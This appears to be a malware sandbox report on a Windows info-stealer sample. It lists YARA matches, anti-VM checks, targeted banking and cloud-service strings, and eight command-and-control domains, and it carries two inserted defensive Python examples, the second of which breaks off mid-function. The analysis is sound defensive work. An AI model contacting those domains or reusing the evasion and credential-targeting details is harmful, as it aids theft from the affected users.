            Source: SPFFah2O2q.exe | Binary or memory string: OriginalFilenamesDefenca2 vs SPFFah2O2q.exe
            Source: SPFFah2O2q.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1722412139.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: SPFFah2O2q.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/5@10/2
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 0_2_020C07A6 CreateToolhelp32Snapshot,Module32First, | 0_2_020C07A6
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Code function: 0_2_00437DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW, | 0_2_00437DF0
            Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess768
            Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\36ec44c9-6b3d-455f-bf47-88a3e1d4df6f
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: SPFFah2O2q.exe, 00000000.00000003.1534922228.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1558853631.0000000002E7B000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1559913780.0000000002F12000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534460127.0000000002E95000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SPFFah2O2q.exe | Virustotal: Detection: 41%
            Source: SPFFah2O2q.exe | ReversingLabs: Detection: 50%
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | File read: C:\Users\user\Desktop\SPFFah2O2q.exe
            Source: unknown | Process created: C:\Users\user\Desktop\SPFFah2O2q.exe "C:\Users\user\Desktop\SPFFah2O2q.exe"
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 1812
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Section loaded: msimg32.dll
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Section loaded: msvcr100.dll
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Section loaded: webio.dll
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\SPFFah2O2q.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

Data Obfuscation

Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Unpacked PE file: 0.2.SPFFah2O2q.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Unpacked PE file: 0.2.SPFFah2O2q.exe.400000.0.unpack
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh :: 0_2_0043D812
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_00443469 push ebp; iretd :: 0_2_0044346C
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_0044366E push 9F00CD97h; ret :: 0_2_004436B1
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h :: 0_2_0043AE3E
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_004477A5 push ebp; iretd :: 0_2_004477AA
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_020C582A push ss; retf :: 0_2_020C589B
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_020C58AD push ss; retf :: 0_2_020C589B
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_020C3480 push ebp; ret :: 0_2_020C3483
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_020C14DC push 00000039h; ret :: 0_2_020C15B3
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_020C1545 push 00000039h; ret :: 0_2_020C15B3
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_020C156B push 00000039h; ret :: 0_2_020C15B3
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_0212B097 push eax; mov dword ptr [esp], 1D1E1F10h :: 0_2_0212B0A5
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_0212DA77 push eax; mov dword ptr [esp], 707F7E0Dh :: 0_2_0212DA79
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_02113A79 push esp; iretd :: 0_2_02113A7C
Source: SPFFah2O2q.exe :: Static PE information: section name: .text entropy: 7.746542950910192
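The two static findings above (a .text section with entropy 7.75 and section rights that change once the sample unpacks itself) are the checks a triage script runs first. The following is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: a minimal parser for the PE section table plus Shannon entropy, with a constructed in-memory PE as fixture (it is not the analysed SPFFah2O2q.exe). The 7.0 entropy threshold is an assumption in common use, not a value from the report.

```python
"""Section-entropy and section-rights triage for a PE file (added example)."""
import math
import struct
from typing import Dict, List, Tuple

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
PACKED_ENTROPY_THRESHOLD = 7.0   # assumption: common triage cut-off, not from the report
SECTION_HEADER = "<8sIIIIIIHHI"  # the 40-byte IMAGE_SECTION_HEADER layout


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def rights(characteristics: int) -> str:
    """Render section rights the way the report does ('ER', 'RW', ...)."""
    flags = ((IMAGE_SCN_MEM_EXECUTE, "E"), (IMAGE_SCN_MEM_READ, "R"), (IMAGE_SCN_MEM_WRITE, "W"))
    return "".join(letter for bit, letter in flags if characteristics & bit)


def parse_sections(pe: bytes) -> List[Dict]:
    """DOS header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_optional = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_optional
    sections = []
    for i in range(num_sections):
        name, _vsize, _vaddr, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HEADER, pe, table + i * 40)
        raw = pe[raw_ptr:raw_ptr + raw_size]  # entropy is taken over the on-disk bytes
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "raw_size": raw_size, "characteristics": chars,
                         "entropy": shannon_entropy(raw)})
    return sections


def triage(pe: bytes) -> List[str]:
    """Findings in the report's vocabulary: high-entropy sections and W+X sections."""
    findings = []
    wx = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    for s in parse_sections(pe):
        tag = f"{s['name']}:{rights(s['characteristics'])}"
        if s["entropy"] >= PACKED_ENTROPY_THRESHOLD:
            findings.append(f"{tag} entropy {s['entropy']:.2f} >= {PACKED_ENTROPY_THRESHOLD}: "
                            "likely packed or encrypted")
        if s["characteristics"] & wx == wx:
            findings.append(f"{tag} is writable and executable: in-place unpacking or self-modifying code")
    return findings


def build_sample_pe(sections: List[Tuple[bytes, int, bytes]]) -> bytes:
    """Constructed fixture: PE32 headers, a section table and 512-byte aligned raw
    data with a zeroed optional header (enough for the parser above, not loadable)."""
    e_lfanew, size_optional = 0x40, 0xE0
    first_raw = (e_lfanew + 4 + 20 + size_optional + 40 * len(sections) + 0x1FF) & ~0x1FF
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_optional, 0x0102)
    table, blobs, raw_ptr, vaddr = b"", b"", first_raw, 0x1000
    for name, chars, data in sections:
        raw_size = (len(data) + 0x1FF) & ~0x1FF
        table += struct.pack(SECTION_HEADER, name.ljust(8, b"\0"), len(data), vaddr,
                             raw_size, raw_ptr, 0, 0, 0, 0, chars)
        blobs += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        vaddr += (len(data) + 0xFFF) & ~0xFFF
    headers = dos + b"PE\0\0" + coff + b"\0" * size_optional + table
    return headers.ljust(first_raw, b"\0") + blobs


if __name__ == "__main__":
    # Mimics the report's shape: a packed-looking .text (uniform bytes) next to a
    # low-entropy .data. Constructed content, not the real sample's bytes.
    sample = build_sample_pe([
        (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, bytes(range(256)) * 8),
        (b".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, b"\x90" * 600),
    ])
    for s in parse_sections(sample):
        print(f"{s['name']:<8} {rights(s['characteristics']):<3} entropy={s['entropy']:.3f}")
    for line in triage(sample):
        print("FINDING:", line)
```

Run it against a real file by replacing the fixture with `open(path, "rb").read()`; the numbers it prints for .text are directly comparable to the report's entropy value, and a section that is both writable and executable is the static counterpart of the "Unpacked PE file" behaviour line above.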
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe :: Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 events; identical repeated entries collapsed)
Source: C:\Windows\SysWOW64\WerFault.exe :: Process information set: NOOPENFILEERRORBOX (50 events; identical repeated entries collapsed)
Source: C:\Users\user\Desktop\SPFFah2O2q.exe TID: 1612 :: Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F15000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: - GDCDYNVMware20,11696494690p
Source: Amcache.hve.5.dr :: Binary or memory string: VMware
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: AMC password management pageVMware20,11696494690
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Amcache.hve.5.dr :: Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000002.1720458759.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr :: Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Amcache.hve.5.dr :: Binary or memory string: vmci.sys
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: global block list test formVMware20,11696494690
Source: Amcache.hve.5.dr :: Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr :: Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr :: Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr :: Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr :: Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Amcache.hve.5.dr :: Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr :: Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr :: Binary or memory string: VMware VMCI Bus Device
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Amcache.hve.5.dr :: Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr :: Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: Amcache.hve.5.dr :: Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: discord.comVMware20,11696494690f
Source: Amcache.hve.5.dr :: Binary or memory string: VMware Virtual USB Mouse
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Amcache.hve.5.dr :: Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr :: Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr :: Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Amcache.hve.5.dr :: Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr :: Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr :: Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Amcache.hve.5.dr :: Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Amcache.hve.5.dr :: Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Amcache.hve.5.dr :: Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Amcache.hve.5.dr :: Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr :: Binary or memory string: \driver\vmci,\driver\pci
Source: SPFFah2O2q.exe, 00000000.00000003.1558106709.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Amcache.hve.5.dr :: Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr :: Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: API call chain: ExitProcess graph end node :: graph_0-26046
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_0043C1F0 LdrInitializeThunk, :: 0_2_0043C1F0
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_020C0083 push dword ptr fs:[00000030h] :: 0_2_020C0083
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_020F092B mov eax, dword ptr fs:[00000030h] :: 0_2_020F092B
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Code function: 0_2_020F0D90 mov eax, dword ptr fs:[00000030h] :: 0_2_020F0D90

HIPS / PFW / Operating System Protection Evasion

Source: SPFFah2O2q.exe :: String found in binary or memory: rapeflowwj.lat
Source: SPFFah2O2q.exe :: String found in binary or memory: crosshuaht.lat
Source: SPFFah2O2q.exe :: String found in binary or memory: sustainskelet.lat
Source: SPFFah2O2q.exe :: String found in binary or memory: aspecteirs.lat
Source: SPFFah2O2q.exe :: String found in binary or memory: energyaffai.lat
Source: SPFFah2O2q.exe :: String found in binary or memory: necklacebudi.lat
Source: SPFFah2O2q.exe :: String found in binary or memory: discokeyus.lat
Source: SPFFah2O2q.exe :: String found in binary or memory: grannyejh.lat
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.5.dr :: Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr :: Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr :: Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr :: Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.5.dr :: Binary or memory string: MsMpEng.exe
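The eight .lat domains above are the command-and-control names the report extracted from the sample's strings, and the practical use of such a list is to sweep DNS telemetry for them. The following is an added example, not part of the Joe Sandbox report: the domain set is the report's own, while the DNS log lines are constructed for the demonstration and their layout (timestamp, client IP, record type, query name) is an assumption rather than any product's format. Matching is done label by label so that a lookalike such as notrapeflowwj.lat does not match the way a naive suffix test would, and subdomains of a listed name do match.

```python
"""Sweep DNS query logs for the C2 domains listed in the report (added example)."""
from typing import Iterable, List, Optional, Tuple

# The report's own indicator list.
C2_DOMAINS = frozenset({
    "rapeflowwj.lat", "crosshuaht.lat", "sustainskelet.lat", "aspecteirs.lat",
    "energyaffai.lat", "necklacebudi.lat", "discokeyus.lat", "grannyejh.lat",
})


def normalize(name: str) -> str:
    """Lower-case and strip whitespace and the trailing root dot ('a.lat.' -> 'a.lat')."""
    return name.strip().rstrip(".").lower()


def matching_ioc(qname: str, iocs=C2_DOMAINS) -> Optional[str]:
    """Return the indicator that qname equals or is a subdomain of, else None.

    Compares whole labels, so 'notrapeflowwj.lat' is not a hit for 'rapeflowwj.lat'
    while 'cdn.grannyejh.lat' is a hit for 'grannyejh.lat'."""
    labels = normalize(qname).split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in iocs:
            return candidate
    return None


def scan_dns_log(lines: Iterable[str], iocs=C2_DOMAINS) -> List[Tuple[int, str, str, str]]:
    """Return (line number, client, normalized query name, matched indicator) per hit.

    Assumed line layout: '<timestamp> <client ip> <record type> <query name>'."""
    hits = []
    for n, line in enumerate(lines, 1):
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed line; in production, count these rather than drop silently
        _ts, client, _rtype, qname = parts[:4]
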